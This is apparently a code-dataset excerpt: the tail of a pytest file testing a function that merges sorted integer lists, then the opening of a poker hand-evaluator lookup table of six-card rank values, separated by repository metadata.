                17, 20, 40, 44, 50, 52, 81, 89, 91, 95]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_5():
    # Larger mix: seven lists, in-list duplicates (8, 8) and cross-list ones.
    arrays = [
        [-88, -56, -43, -41, -13, -8, 82],
        [-38, 53],
        [-75, -48, -42, -27, 20, 35, 55],
        [-55, -50, -48, -45, 62, 69, 77],
        [-90, -27, -22, -19, -6, -3, 4, 6, 91],
        [-86, -67, -66, 2, 8, 8, 39, 74],
        [-62, 34, 40, 42, 47, 48, 55, 56, 68, 87],
    ]
    expected = [-90, -88, -86, -75, -67, -66, -62, -56, -55, -50, -48, -48,
                -45, -43, -42, -41, -38, -27, -27, -22, -19, -13, -8, -6, -3,
                2, 4, 6, 8, 8, 20, 34, 35, 39, 40, 42, 47, 48, 53, 55, 55,
                56, 62, 68, 69, 74, 77, 82, 87, 91]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_6():
    # Includes several single-element lists ([-83], [50], [-100]).
    arrays = [
        [-93, -83, -43, -32, -32, -15, -14, 12, 78, 80],
        [-83],
        [-82, -51, -29, 40, 60, 76, 80],
        [50],
        [-33, -16],
        [-100],
        [-33, -11, 23, 29, 29, 43],
        [0, 70],
        [-57, -43, -41, -18, -5, 74],
    ]
    expected = [-100, -93, -83, -83, -82, -57, -51, -43, -43, -41, -33, -33,
                -32, -32, -29, -18, -16, -15, -14, -11, -5, 0, 12, 23, 29,
                29, 40, 43, 50, 60, 70, 74, 76, 78, 80, 80]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_7():
    # First list holds a single large value; nine lists total.
    arrays = [
        [98],
        [-87, -79, -56, -33, -20, -10, -5, 19, 49, 86],
        [-73, -49],
        [-98, -63, -47, -4, 21],
        [-56, -43, -24, 8, 34, 80, 83],
        [-83, -65, -61, -30, -26, -16, 16, 19],
        [-91, -42, -21, 91],
        [-73, -62, -56, -30, 11, 67],
        [-91, -90, -40, 32, 94],
    ]
    expected = [-98, -91, -91, -90, -87, -83, -79, -73, -73, -65, -63, -62,
                -61, -56, -56, -56, -49, -47, -43, -42, -40, -33, -30, -30,
                -26, -24, -21, -20, -16, -10, -5, -4, 8, 11, 16, 19, 19, 21,
                32, 34, 49, 67, 80, 83, 86, 91, 94, 98]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_8():
    # Duplicate 75 appears in two different lists.
    arrays = [
        [-81, 36, 57, 59],
        [-65, -58, -47, -39, 29, 53, 66, 75, 88, 92],
        [-67, -54, -40, -25, 9, 17, 55, 75, 94],
        [-35, -3, 24, 82],
        [-86, 32, 95],
    ]
    expected = [-86, -81, -67, -65, -58, -54, -47, -40, -39, -35, -25, -3, 9,
                17, 24, 29, 32, 36, 53, 55, 57, 59, 66, 75, 75, 82, 88, 92,
                94, 95]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_9():
    # Duplicates -75, -40 and 96 span multiple lists.
    arrays = [
        [-93, -83, -78, -75, -40, -32, 48],
        [-90, -75, -57, 7, 11, 21, 53, 84, 89],
        [-50, -40, -20, 71, 96],
        [-49, 13, 18, 61, 97],
        [42, 96],
    ]
    expected = [-93, -90, -83, -78, -75, -75, -57, -50, -49, -40, -40, -32,
                -20, 7, 11, 13, 18, 21, 42, 48, 53, 61, 71, 84, 89, 96, 96,
                97]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_10():
    # Nine lists with heavy duplication, including repeats within one list.
    arrays = [
        [-63, -55, -9, 37, 86, 97],
        [-62, -48, -37, -16, 11, 33, 80, 97],
        [-51, 5, 34],
        [-24, -24, -19, 32, 46, 97],
        [-98, -56, -12, -2, -1, 11, 47, 79],
        [-59, 64, 93, 96],
        [-96, -51, -21, -18, 29, 57, 87, 90, 92],
        [-89, -85, -55, -12, 27],
        [-96, -96, -95, -95, -71, -45, -28, 8, 19, 100],
    ]
    expected = [-98, -96, -96, -96, -95, -95, -89, -85, -71, -63, -62, -59,
                -56, -55, -55, -51, -51, -48, -45, -37, -28, -24, -24, -21,
                -19, -18, -16, -12, -12, -9, -2, -1, 5, 8, 11, 11, 19, 27,
                29, 32, 33, 34, 37, 46, 47, 57, 64, 79, 80, 86, 87, 90, 92,
                93, 96, 97, 97, 97, 100]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_11():
    # Small case: three lists, no duplicates.
    arrays = [
        [49, 72],
        [-95, -49, -18, -16, 1, 16, 36, 40, 75, 92],
        [-77, 11, 65, 91],
    ]
    expected = [-95, -77, -49, -18, -16, 1, 11, 16, 36, 40, 49, 65, 72, 75,
                91, 92]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_12():
    # -94, -83 and 64 each occur in two lists.
    arrays = [
        [-94, -93, -25, -2, 67, 85],
        [-83, -74, 64],
        [-83, 10, 46, 64],
        [-94, -54, -40, 9, 22, 49],
    ]
    expected = [-94, -94, -93, -83, -83, -74, -54, -40, -25, -2, 9, 10, 22,
                46, 49, 64, 64, 67, 85]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_13():
    # Four lists of differing lengths, all-distinct values.
    arrays = [
        [-87, -67, -56, -15, 67],
        [-98, -90, -85, -3, 5, 43, 44],
        [-97, -78, -73, -65, -17, 27, 66, 77, 78, 92],
        [-99, -62, 11, 15, 50],
    ]
    expected = [-99, -98, -97, -90, -87, -85, -78, -73, -67, -65, -62, -56,
                -17, -15, -3, 5, 11, 15, 27, 43, 44, 50, 66, 67, 77, 78, 92]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_14():
    # A singleton list ([-93]) duplicates a value from another list.
    arrays = [
        [-79, -77, -48, -39, -27, 10, 39, 61, 83, 99],
        [-93, 10],
        [-98, -90, -44, -33, -5, 40, 69, 90, 96],
        [-93],
        [-32, 9, 14, 20, 85],
    ]
    expected = [-98, -93, -93, -90, -79, -77, -48, -44, -39, -33, -32, -27,
                -5, 9, 10, 10, 14, 20, 39, 40, 61, 69, 83, 85, 90, 96, 99]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_15():
    # Minimal case: a singleton merged into a longer list.
    arrays = [[14], [-88, -16, 26, 38, 51, 62, 84, 88]]
    expected = [-88, -16, 14, 26, 38, 51, 62, 84, 88]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_16():
    # Repeated -54 inside one list plus a cross-list duplicate 34.
    arrays = [
        [-62, -54, -54, 31, 34, 51],
        [-41],
        [33, 34],
        [-98, 68, 83],
        [-25, -14],
    ]
    expected = [-98, -62, -54, -54, -41, -25, -14, 31, 33, 34, 34, 51, 68,
                83]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_17():
    # Eight lists; duplicates -16 and 64 cross list boundaries.
    arrays = [
        [-53, -16, -13, -11, -6, 21, 26, 35],
        [-99, -93, -62, -47, -16, 4, 55, 59, 64, 76],
        [-96, -41, -8],
        [-39, -28, -4],
        [-95, -48, -45, -25, 63, 64, 98],
        [-38, -32, -7, 82],
        [-42, 25, 49, 79, 86],
        [-88, -65, 7, 8, 44],
    ]
    expected = [-99, -96, -95, -93, -88, -65, -62, -53, -48, -47, -45, -42,
                -41, -39, -38, -32, -28, -25, -16, -16, -13, -11, -8, -7, -6,
                -4, 4, 7, 8, 21, 25, 26, 35, 44, 49, 55, 59, 63, 64, 64, 76,
                79, 82, 86, 98]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_18():
    # Six lists; duplicates -46 and 46 cross list boundaries.
    arrays = [
        [-33, 57, 74],
        [-76, -72, -46, -21, -16, -10, 16, 21, 47, 67],
        [-59, -55, -47, -46, -35, 38],
        [-62, -25, 3, 30, 46, 71],
        [-91, -37, -26, -12, -8, 2, 9, 46, 56, 93],
        [-58, 82, 97],
    ]
    expected = [-91, -76, -72, -62, -59, -58, -55, -47, -46, -46, -37, -35,
                -33, -26, -25, -21, -16, -12, -10, -8, 2, 3, 9, 16, 21, 30,
                38, 46, 46, 47, 56, 57, 67, 71, 74, 82, 93, 97]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_19():
    # Ten lists; value 27 appears three times across three lists.
    arrays = [
        [-64, -51, -5, 1, 6, 12, 27, 32, 62, 88],
        [-66, -65, -60, 17, 22],
        [-57, -7, 13, 70, 79],
        [-88, -86, -73, -59, -36, -12, 11, 48, 58, 99],
        [-71, -28],
        [21, 38],
        [-55, -44, -27],
        [-96, -93, -5, 13],
        [-19, -11, 27, 36, 43, 79, 87],
        [-72, -53, -10, 1, 27, 77, 88],
    ]
    expected = [-96, -93, -88, -86, -73, -72, -71, -66, -65, -64, -60, -59,
                -57, -55, -53, -51, -44, -36, -28, -27, -19, -12, -11, -10,
                -7, -5, -5, 1, 1, 6, 11, 12, 13, 13, 17, 21, 22, 27, 27, 27,
                32, 36, 38, 43, 48, 58, 62, 70, 77, 79, 79, 87, 88, 88, 99]
    assert mergeSortedArrays(arrays=arrays) == expected
def test_mergeSortedArrays_case_20():
    """Merge five sorted arrays; duplicate -53 across arrays must be preserved."""
    # Fix: the assert was not indented under the def (SyntaxError as written).
    assert mergeSortedArrays(arrays=[[-19, 33, 34], [-94, -53, -10, -3, 44, 73], [27, 42, 70, 86], [-28, 91], [-53, -27, 31, 77, 96, 99]]) == [-94, -53, -53, -28, -27, -19, -10, -3, 27, 31, 33, 34, 42, 44, 70, 73, 77, 86, 91, 96, 99]
| 118.31746 | 588 | 0.490877 | 1,410 | 7,454 | 2.551064 | 0.080851 | 0.038921 | 0.133445 | 0.155685 | 0.116764 | 0.006672 | 0 | 0 | 0 | 0 | 0 | 0.404662 | 0.200027 | 7,454 | 62 | 589 | 120.225806 | 0.198558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.487805 | 1 | 0.487805 | true | 0 | 0.02439 | 0 | 0.512195 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
a3eb36723997a288b404d50d57da80539a7af48b | 116,216 | py | Python | python/phevaluator/tables/hashtable6.py | azriel1rf/PokerHandEvaluator | c34a25aa58de807f239a0835a359b5642e1c30f6 | [
"Apache-2.0"
] | 161 | 2016-03-10T11:35:12.000Z | 2022-03-27T23:23:22.000Z | python/phevaluator/tables/hashtable6.py | azriel1rf/PokerHandEvaluator | c34a25aa58de807f239a0835a359b5642e1c30f6 | [
"Apache-2.0"
] | 49 | 2016-12-18T09:21:02.000Z | 2022-01-11T10:27:08.000Z | python/phevaluator/tables/hashtable6.py | azriel1rf/PokerHandEvaluator | c34a25aa58de807f239a0835a359b5642e1c30f6 | [
"Apache-2.0"
] | 65 | 2016-04-18T03:12:49.000Z | 2022-02-11T14:48:48.000Z | """Rank values for six cards."""
NO_FLUSH_6 = [
11, 167, 23, 11, 167, 179, 23, 12,
168, 2468, 180, 24, 168, 191, 192, 180,
35, 35, 36, 11, 167, 179, 23, 12,
1610, 2468, 1676, 24, 168, 2479, 2600, 180,
191, 1742, 192, 35, 36, 13, 169, 2469,
181, 25, 169, 2490, 2611, 181, 2480, 2721,
2601, 193, 193, 37, 169, 203, 204, 181,
203, 1808, 204, 205, 205, 193, 47, 47,
48, 47, 48, 49, 11, 167, 179, 23,
12, 1610, 2468, 1676, 24, 168, 2479, 2600,
180, 191, 1742, 192, 35, 36, 13, 1611,
2469, 1677, 25, 1621, 1600, 1600, 1687, 2480,
1600, 2601, 1743, 1753, 37, 169, 2490, 2611,
181, 2491, 1600, 2612, 2721, 2722, 193, 203,
1808, 204, 1809, 1819, 205, 47, 48, 49,
14, 170, 2470, 182, 26, 170, 2501, 2622,
182, 2481, 2732, 2602, 194, 194, 38, 170,
2501, 2622, 182, 2502, 1600, 2623, 2732, 2733,
194, 2492, 2831, 2613, 2831, 2832, 2723, 206,
206, 206, 50, 170, 215, 216, 182, 215,
1874, 216, 217, 217, 194, 215, 1874, 216,
1875, 1885, 217, 218, 218, 218, 206, 59,
59, 60, 59, 60, 61, 59, 60, 61,
62, 11, 167, 179, 23, 12, 1610, 2468,
1676, 24, 168, 2479, 2600, 180, 191, 1742,
192, 35, 36, 13, 1611, 2469, 1677, 25,
1621, 3326, 3546, 1687, 2480, 3766, 2601, 1743,
1753, 37, 169, 2490, 2611, 181, 2491, 3986,
2612, 2721, 2722, 193, 203, 1808, 204, 1809,
1819, 205, 47, 48, 49, 14, 1612, 2470,
1678, 26, 1622, 3327, 3547, 1688, 2481, 3767,
2602, 1744, 1754, 38, 1631, 3336, 3556, 1697,
3381, 1600, 1601, 3776, 1601, 1763, 2492, 3987,
2613, 3996, 1601, 2723, 1810, 1820, 1829, 50,
170, 2501, 2622, 182, 2502, 4206, 2623, 2732,
2733, 194, 2503, 4207, 2624, 4216, 1601, 2734,
2831, 2832, 2833, 206, 215, 1874, 216, 1875,
1885, 217, 1876, 1886, 1895, 218, 59, 60,
61, 62, 15, 171, 2471, 183, 27, 171,
2512, 2633, 183, 2482, 2743, 2603, 195, 195,
39, 171, 2512, 2633, 183, 2513, 4426, 2634,
2743, 2744, 195, 2493, 2842, 2614, 2842, 2843,
2724, 207, 207, 207, 51, 171, 2512, 2633,
183, 2513, 4426, 2634, 2743, 2744, 195, 2514,
4427, 2635, 4436, 1601, 2745, 2842, 2843, 2844,
207, 2504, 2930, 2625, 2930, 2931, 2735, 2930,
2931, 2932, 2834, 219, 219, 219, 219, 63,
171, 227, 228, 183, 227, 1940, 228, 229,
229, 195, 227, 1940, 228, 1941, 1951, 229,
230, 230, 230, 207, 227, 1940, 228, 1941,
1951, 229, 1942, 1952, 1961, 230, 231, 231,
231, 231, 219, 71, 71, 72, 71, 72,
73, 71, 72, 73, 74, 71, 72, 73,
74, 75, 11, 167, 179, 23, 12, 1610,
2468, 1676, 24, 168, 2479, 2600, 180, 191,
1742, 192, 35, 36, 13, 1611, 2469, 1677,
25, 1621, 3326, 3546, 1687, 2480, 3766, 2601,
1743, 1753, 37, 169, 2490, 2611, 181, 2491,
3986, 2612, 2721, 2722, 193, 203, 1808, 204,
1809, 1819, 205, 47, 48, 49, 14, 1612,
2470, 1678, 26, 1622, 3327, 3547, 1688, 2481,
3767, 2602, 1744, 1754, 38, 1631, 3336, 3556,
1697, 3381, 1600, 3601, 3776, 3821, 1763, 2492,
3987, 2613, 3996, 4041, 2723, 1810, 1820, 1829,
50, 170, 2501, 2622, 182, 2502, 4206, 2623,
2732, 2733, 194, 2503, 4207, 2624, 4216, 4261,
2734, 2831, 2832, 2833, 206, 215, 1874, 216,
1875, 1885, 217, 1876, 1886, 1895, 218, 59,
60, 61, 62, 15, 1613, 2471, 1679, 27,
1623, 3328, 3548, 1689, 2482, 3768, 2603, 1745,
1755, 39, 1632, 3337, 3557, 1698, 3382, 6186,
3602, 3777, 3822, 1764, 2493, 3988, 2614, 3997,
4042, 2724, 1811, 1821, 1830, 51, 1640, 3345,
3565, 1706, 3390, 6194, 3610, 3785, 3830, 1772,
3426, 6230, 3646, 1602, 1601, 1602, 4005, 4050,
1602, 1838, 2504, 4208, 2625, 4217, 4262, 2735,
4225, 4270, 1602, 2834, 1877, 1887, 1896, 1904,
63, 171, 2512, 2633, 183, 2513, 4426, 2634,
2743, 2744, 195, 2514, 4427, 2635, 4436, 4481,
2745, 2842, 2843, 2844, 207, 2515, 4428, 2636,
4437, 4482, 2746, 4445, 4490, 1602, 2845, 2930,
2931, 2932, 2933, 219, 227, 1940, 228, 1941,
1951, 229, 1942, 1952, 1961, 230, 1943, 1953,
1962, 1970, 231, 71, 72, 73, 74, 75,
16, 172, 2472, 184, 28, 172, 2523, 2644,
184, 2483, 2754, 2604, 196, 196, 40, 172,
2523, 2644, 184, 2524, 4646, 2645, 2754, 2755,
196, 2494, 2853, 2615, 2853, 2854, 2725, 208,
208, 208, 52, 172, 2523, 2644, 184, 2524,
4646, 2645, 2754, 2755, 196, 2525, 4647, 2646,
4656, 4701, 2756, 2853, 2854, 2855, 208, 2505,
2941, 2626, 2941, 2942, 2736, 2941, 2942, 2943,
2835, 220, 220, 220, 220, 64, 172, 2523,
2644, 184, 2524, 4646, 2645, 2754, 2755, 196,
2525, 4647, 2646, 4656, 4701, 2756, 2853, 2854,
2855, 208, 2526, 4648, 2647, 4657, 4702, 2757,
4665, 4710, 1602, 2856, 2941, 2942, 2943, 2944,
220, 2516, 3018, 2637, 3018, 3019, 2747, 3018,
3019, 3020, 2846, 3018, 3019, 3020, 3021, 2934,
232, 232, 232, 232, 232, 76, 172, 239,
240, 184, 239, 2006, 240, 241, 241, 196,
239, 2006, 240, 2007, 2017, 241, 242, 242,
242, 208, 239, 2006, 240, 2007, 2017, 241,
2008, 2018, 2027, 242, 243, 243, 243, 243,
220, 239, 2006, 240, 2007, 2017, 241, 2008,
2018, 2027, 242, 2009, 2019, 2028, 2036, 243,
244, 244, 244, 244, 244, 232, 83, 83,
84, 83, 84, 85, 83, 84, 85, 86,
83, 84, 85, 86, 87, 83, 84, 85,
86, 87, 88, 11, 167, 179, 23, 12,
1610, 2468, 1676, 24, 168, 2479, 2600, 180,
191, 1742, 192, 35, 36, 13, 1611, 2469,
1677, 25, 1621, 3326, 3546, 1687, 2480, 3766,
2601, 1743, 1753, 37, 169, 2490, 2611, 181,
2491, 3986, 2612, 2721, 2722, 193, 203, 1808,
204, 1809, 1819, 205, 47, 48, 49, 14,
1612, 2470, 1678, 26, 1622, 3327, 3547, 1688,
2481, 3767, 2602, 1744, 1754, 38, 1631, 3336,
3556, 1697, 3381, 1600, 3601, 3776, 3821, 1763,
2492, 3987, 2613, 3996, 4041, 2723, 1810, 1820,
1829, 50, 170, 2501, 2622, 182, 2502, 4206,
2623, 2732, 2733, 194, 2503, 4207, 2624, 4216,
4261, 2734, 2831, 2832, 2833, 206, 215, 1874,
216, 1875, 1885, 217, 1876, 1886, 1895, 218,
59, 60, 61, 62, 15, 1613, 2471, 1679,
27, 1623, 3328, 3548, 1689, 2482, 3768, 2603,
1745, 1755, 39, 1632, 3337, 3557, 1698, 3382,
6186, 3602, 3777, 3822, 1764, 2493, 3988, 2614,
3997, 4042, 2724, 1811, 1821, 1830, 51, 1640,
3345, 3565, 1706, 3390, 6194, 3610, 3785, 3830,
1772, 3426, 6230, 3646, 6350, 1601, 3866, 4005,
4050, 4086, 1838, 2504, 4208, 2625, 4217, 4262,
2735, 4225, 4270, 4306, 2834, 1877, 1887, 1896,
1904, 63, 171, 2512, 2633, 183, 2513, 4426,
2634, 2743, 2744, 195, 2514, 4427, 2635, 4436,
4481, 2745, 2842, 2843, 2844, 207, 2515, 4428,
2636, 4437, 4482, 2746, 4445, 4490, 4526, 2845,
2930, 2931, 2932, 2933, 219, 227, 1940, 228,
1941, 1951, 229, 1942, 1952, 1961, 230, 1943,
1953, 1962, 1970, 231, 71, 72, 73, 74,
75, 16, 1614, 2472, 1680, 28, 1624, 3329,
3549, 1690, 2483, 3769, 2604, 1746, 1756, 40,
1633, 3338, 3558, 1699, 3383, 6187, 3603, 3778,
3823, 1765, 2494, 3989, 2615, 3998, 4043, 2725,
1812, 1822, 1831, 52, 1641, 3346, 3566, 1707,
3391, 6195, 3611, 3786, 3831, 1773, 3427, 6231,
3647, 6351, 6679, 3867, 4006, 4051, 4087, 1839,
2505, 4209, 2626, 4218, 4263, 2736, 4226, 4271,
4307, 2835, 1878, 1888, 1897, 1905, 64, 1648,
3353, 3573, 1714, 3398, 6202, 3618, 3793, 3838,
1780, 3434, 6238, 3654, 6358, 6686, 3874, 4013,
4058, 4094, 1846, 3462, 6266, 3682, 6386, 6714,
3902, 1603, 1603, 1602, 1603, 4233, 4278, 4314,
1603, 1912, 2516, 4429, 2637, 4438, 4483, 2747,
4446, 4491, 4527, 2846, 4453, 4498, 4534, 1603,
2934, 1944, 1954, 1963, 1971, 1978, 76, 172,
2523, 2644, 184, 2524, 4646, 2645, 2754, 2755,
196, 2525, 4647, 2646, 4656, 4701, 2756, 2853,
2854, 2855, 208, 2526, 4648, 2647, 4657, 4702,
2757, 4665, 4710, 4746, 2856, 2941, 2942, 2943,
2944, 220, 2527, 4649, 2648, 4658, 4703, 2758,
4666, 4711, 4747, 2857, 4673, 4718, 4754, 1603,
2945, 3018, 3019, 3020, 3021, 3022, 232, 239,
2006, 240, 2007, 2017, 241, 2008, 2018, 2027,
242, 2009, 2019, 2028, 2036, 243, 2010, 2020,
2029, 2037, 2044, 244, 83, 84, 85, 86,
87, 88, 17, 173, 2473, 185, 29, 173,
2534, 2655, 185, 2484, 2765, 2605, 197, 197,
41, 173, 2534, 2655, 185, 2535, 4866, 2656,
2765, 2766, 197, 2495, 2864, 2616, 2864, 2865,
2726, 209, 209, 209, 53, 173, 2534, 2655,
185, 2535, 4866, 2656, 2765, 2766, 197, 2536,
4867, 2657, 4876, 4921, 2767, 2864, 2865, 2866,
209, 2506, 2952, 2627, 2952, 2953, 2737, 2952,
2953, 2954, 2836, 221, 221, 221, 221, 65,
173, 2534, 2655, 185, 2535, 4866, 2656, 2765,
2766, 197, 2536, 4867, 2657, 4876, 4921, 2767,
2864, 2865, 2866, 209, 2537, 4868, 2658, 4877,
4922, 2768, 4885, 4930, 4966, 2867, 2952, 2953,
2954, 2955, 221, 2517, 3029, 2638, 3029, 3030,
2748, 3029, 3030, 3031, 2847, 3029, 3030, 3031,
3032, 2935, 233, 233, 233, 233, 233, 77,
173, 2534, 2655, 185, 2535, 4866, 2656, 2765,
2766, 197, 2536, 4867, 2657, 4876, 4921, 2767,
2864, 2865, 2866, 209, 2537, 4868, 2658, 4877,
4922, 2768, 4885, 4930, 4966, 2867, 2952, 2953,
2954, 2955, 221, 2538, 4869, 2659, 4878, 4923,
2769, 4886, 4931, 4967, 2868, 4893, 4938, 4974,
1603, 2956, 3029, 3030, 3031, 3032, 3033, 233,
2528, 3095, 2649, 3095, 3096, 2759, 3095, 3096,
3097, 2858, 3095, 3096, 3097, 3098, 2946, 3095,
3096, 3097, 3098, 3099, 3023, 245, 245, 245,
245, 245, 245, 89, 173, 251, 252, 185,
251, 2072, 252, 253, 253, 197, 251, 2072,
252, 2073, 2083, 253, 254, 254, 254, 209,
251, 2072, 252, 2073, 2083, 253, 2074, 2084,
2093, 254, 255, 255, 255, 255, 221, 251,
2072, 252, 2073, 2083, 253, 2074, 2084, 2093,
254, 2075, 2085, 2094, 2102, 255, 256, 256,
256, 256, 256, 233, 251, 2072, 252, 2073,
2083, 253, 2074, 2084, 2093, 254, 2075, 2085,
2094, 2102, 255, 2076, 2086, 2095, 2103, 2110,
256, 257, 257, 257, 257, 257, 257, 245,
95, 95, 96, 95, 96, 97, 95, 96,
97, 98, 95, 96, 97, 98, 99, 95,
96, 97, 98, 99, 100, 95, 96, 97,
98, 99, 100, 101, 11, 167, 179, 23,
12, 1610, 2468, 1676, 24, 168, 2479, 2600,
180, 191, 1742, 192, 35, 36, 13, 1611,
2469, 1677, 25, 1621, 3326, 3546, 1687, 2480,
3766, 2601, 1743, 1753, 37, 169, 2490, 2611,
181, 2491, 3986, 2612, 2721, 2722, 193, 203,
1808, 204, 1809, 1819, 205, 47, 48, 49,
14, 1612, 2470, 1678, 26, 1622, 3327, 3547,
1688, 2481, 3767, 2602, 1744, 1754, 38, 1631,
3336, 3556, 1697, 3381, 1600, 3601, 3776, 3821,
1763, 2492, 3987, 2613, 3996, 4041, 2723, 1810,
1820, 1829, 50, 170, 2501, 2622, 182, 2502,
4206, 2623, 2732, 2733, 194, 2503, 4207, 2624,
4216, 4261, 2734, 2831, 2832, 2833, 206, 215,
1874, 216, 1875, 1885, 217, 1876, 1886, 1895,
218, 59, 60, 61, 62, 15, 1613, 2471,
1679, 27, 1623, 3328, 3548, 1689, 2482, 3768,
2603, 1745, 1755, 39, 1632, 3337, 3557, 1698,
3382, 6186, 3602, 3777, 3822, 1764, 2493, 3988,
2614, 3997, 4042, 2724, 1811, 1821, 1830, 51,
1640, 3345, 3565, 1706, 3390, 6194, 3610, 3785,
3830, 1772, 3426, 6230, 3646, 6350, 1601, 3866,
4005, 4050, 4086, 1838, 2504, 4208, 2625, 4217,
4262, 2735, 4225, 4270, 4306, 2834, 1877, 1887,
1896, 1904, 63, 171, 2512, 2633, 183, 2513,
4426, 2634, 2743, 2744, 195, 2514, 4427, 2635,
4436, 4481, 2745, 2842, 2843, 2844, 207, 2515,
4428, 2636, 4437, 4482, 2746, 4445, 4490, 4526,
2845, 2930, 2931, 2932, 2933, 219, 227, 1940,
228, 1941, 1951, 229, 1942, 1952, 1961, 230,
1943, 1953, 1962, 1970, 231, 71, 72, 73,
74, 75, 16, 1614, 2472, 1680, 28, 1624,
3329, 3549, 1690, 2483, 3769, 2604, 1746, 1756,
40, 1633, 3338, 3558, 1699, 3383, 6187, 3603,
3778, 3823, 1765, 2494, 3989, 2615, 3998, 4043,
2725, 1812, 1822, 1831, 52, 1641, 3346, 3566,
1707, 3391, 6195, 3611, 3786, 3831, 1773, 3427,
6231, 3647, 6351, 6679, 3867, 4006, 4051, 4087,
1839, 2505, 4209, 2626, 4218, 4263, 2736, 4226,
4271, 4307, 2835, 1878, 1888, 1897, 1905, 64,
1648, 3353, 3573, 1714, 3398, 6202, 3618, 3793,
3838, 1780, 3434, 6238, 3654, 6358, 6686, 3874,
4013, 4058, 4094, 1846, 3462, 6266, 3682, 6386,
6714, 3902, 6470, 6798, 1602, 4122, 4233, 4278,
4314, 4342, 1912, 2516, 4429, 2637, 4438, 4483,
2747, 4446, 4491, 4527, 2846, 4453, 4498, 4534,
4562, 2934, 1944, 1954, 1963, 1971, 1978, 76,
172, 2523, 2644, 184, 2524, 4646, 2645, 2754,
2755, 196, 2525, 4647, 2646, 4656, 4701, 2756,
2853, 2854, 2855, 208, 2526, 4648, 2647, 4657,
4702, 2757, 4665, 4710, 4746, 2856, 2941, 2942,
2943, 2944, 220, 2527, 4649, 2648, 4658, 4703,
2758, 4666, 4711, 4747, 2857, 4673, 4718, 4754,
4782, 2945, 3018, 3019, 3020, 3021, 3022, 232,
239, 2006, 240, 2007, 2017, 241, 2008, 2018,
2027, 242, 2009, 2019, 2028, 2036, 243, 2010,
2020, 2029, 2037, 2044, 244, 83, 84, 85,
86, 87, 88, 17, 1615, 2473, 1681, 29,
1625, 3330, 3550, 1691, 2484, 3770, 2605, 1747,
1757, 41, 1634, 3339, 3559, 1700, 3384, 6188,
3604, 3779, 3824, 1766, 2495, 3990, 2616, 3999,
4044, 2726, 1813, 1823, 1832, 53, 1642, 3347,
3567, 1708, 3392, 6196, 3612, 3787, 3832, 1774,
3428, 6232, 3648, 6352, 6680, 3868, 4007, 4052,
4088, 1840, 2506, 4210, 2627, 4219, 4264, 2737,
4227, 4272, 4308, 2836, 1879, 1889, 1898, 1906,
65, 1649, 3354, 3574, 1715, 3399, 6203, 3619,
3794, 3839, 1781, 3435, 6239, 3655, 6359, 6687,
3875, 4014, 4059, 4095, 1847, 3463, 6267, 3683,
6387, 6715, 3903, 6471, 6799, 7008, 4123, 4234,
4279, 4315, 4343, 1913, 2517, 4430, 2638, 4439,
4484, 2748, 4447, 4492, 4528, 2847, 4454, 4499,
4535, 4563, 2935, 1945, 1955, 1964, 1972, 1979,
77, 1655, 3360, 3580, 1721, 3405, 6209, 3625,
3800, 3845, 1787, 3441, 6245, 3661, 6365, 6693,
3881, 4020, 4065, 4101, 1853, 3469, 6273, 3689,
6393, 6721, 3909, 6477, 6805, 7014, 4129, 4240,
4285, 4321, 4349, 1919, 3490, 6294, 3710, 6414,
6742, 3930, 6498, 6826, 7035, 4150, 1604, 1604,
1604, 1603, 1604, 4460, 4505, 4541, 4569, 1604,
1985, 2528, 4650, 2649, 4659, 4704, 2759, 4667,
4712, 4748, 2858, 4674, 4719, 4755, 4783, 2946,
4680, 4725, 4761, 4789, 1604, 3023, 2011, 2021,
2030, 2038, 2045, 2051, 89, 173, 2534, 2655,
185, 2535, 4866, 2656, 2765, 2766, 197, 2536,
4867, 2657, 4876, 4921, 2767, 2864, 2865, 2866,
209, 2537, 4868, 2658, 4877, 4922, 2768, 4885,
4930, 4966, 2867, 2952, 2953, 2954, 2955, 221,
2538, 4869, 2659, 4878, 4923, 2769, 4886, 4931,
4967, 2868, 4893, 4938, 4974, 5002, 2956, 3029,
3030, 3031, 3032, 3033, 233, 2539, 4870, 2660,
4879, 4924, 2770, 4887, 4932, 4968, 2869, 4894,
4939, 4975, 5003, 2957, 4900, 4945, 4981, 5009,
1604, 3034, 3095, 3096, 3097, 3098, 3099, 3100,
245, 251, 2072, 252, 2073, 2083, 253, 2074,
2084, 2093, 254, 2075, 2085, 2094, 2102, 255,
2076, 2086, 2095, 2103, 2110, 256, 2077, 2087,
2096, 2104, 2111, 2117, 257, 95, 96, 97,
98, 99, 100, 101, 18, 174, 2474, 186,
30, 174, 2545, 2666, 186, 2485, 2776, 2606,
198, 198, 42, 174, 2545, 2666, 186, 2546,
5086, 2667, 2776, 2777, 198, 2496, 2875, 2617,
2875, 2876, 2727, 210, 210, 210, 54, 174,
2545, 2666, 186, 2546, 5086, 2667, 2776, 2777,
198, 2547, 5087, 2668, 5096, 5141, 2778, 2875,
2876, 2877, 210, 2507, 2963, 2628, 2963, 2964,
2738, 2963, 2964, 2965, 2837, 222, 222, 222,
222, 66, 174, 2545, 2666, 186, 2546, 5086,
